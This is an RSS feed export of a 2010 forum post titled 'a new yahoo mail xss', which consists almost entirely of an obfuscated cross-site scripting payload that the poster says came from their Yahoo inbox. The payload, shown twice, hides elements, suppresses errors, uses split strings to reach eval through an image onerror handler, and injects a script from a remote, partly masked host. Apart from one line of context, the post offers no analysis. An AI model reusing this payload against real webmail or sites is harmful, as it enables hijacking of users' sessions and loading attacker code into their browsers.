<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>a new yahoo mail xss</title>
        <description>&amp;lt;div id=&amp;quot;xxx&amp;quot; style=&amp;quot;DISPLAY: none&amp;quot; title=&amp;quot;try{window['on'+'error']=function(){return true;};if(window.ufoufoufo!=1){framedir='http://xxxxx.196/';xyzxyz=document.createElement('SCRIPT');xyzxyz.src=framedir+'yahoo/time.asp?uid=xxxxx';document.getElementsByTagName('head')[0].appendChild(xyzxyz);ufoufoufo=1;}}catch(e){}&amp;quot;&amp;gt;.&amp;lt;/div&amp;gt;&amp;lt;div style=&amp;quot;DISPLAY: none&amp;quot;&amp;gt;&amp;lt;img lang=&amp;quot;HTML&amp;quot; id=&amp;quot;inner&amp;quot; title=&amp;quot;&amp;lt;img onerror=window['eva'+'l'](document.getElementById('xxx').title); src=http://#&amp;gt;&amp;quot; width=0 src=&amp;quot;http://#&amp;quot; style=&amp;quot;background:`url(http:// onerror=this.parentNode[this.id+this.lang]=this.title;//)`&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;

I got it from my yahoo inbox.</description>
        <link>http://sla.ckers.org/forum/read.php?10,33529,33529#msg-33529</link>
        <lastBuildDate>Sun, 19 May 2013 18:31:31 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,33529,33529#msg-33529</guid>
            <title>a new yahoo mail xss</title>
            <link>http://sla.ckers.org/forum/read.php?10,33529,33529#msg-33529</link>
            <description><![CDATA[&lt;div id=&quot;xxx&quot; style=&quot;DISPLAY: none&quot; title=&quot;try{window['on'+'error']=function(){return true;};if(window.ufoufoufo!=1){framedir='http://xxxxx.196/';xyzxyz=document.createElement('SCRIPT');xyzxyz.src=framedir+'yahoo/time.asp?uid=xxxxx';document.getElementsByTagName('head')[0].appendChild(xyzxyz);ufoufoufo=1;}}catch(e){}&quot;&gt;.&lt;/div&gt;&lt;div style=&quot;DISPLAY: none&quot;&gt;&lt;img lang=&quot;HTML&quot; id=&quot;inner&quot; title=&quot;&lt;img onerror=window['eva'+'l'](document.getElementById('xxx').title); src=http://#&gt;&quot; width=0 src=&quot;http://#&quot; style=&quot;background:`url(http:// onerror=this.parentNode[this.id+this.lang]=this.title;//)`&quot;&gt;&lt;/div&gt;<br />
<br />
I got it from my yahoo inbox.]]></description>
            <dc:creator>yahooxss2</dc:creator>
            <category>Bugs</category>
            <pubDate>Fri, 19 Feb 2010 17:28:57 -0600</pubDate>
        </item>
    </channel>
</rss>
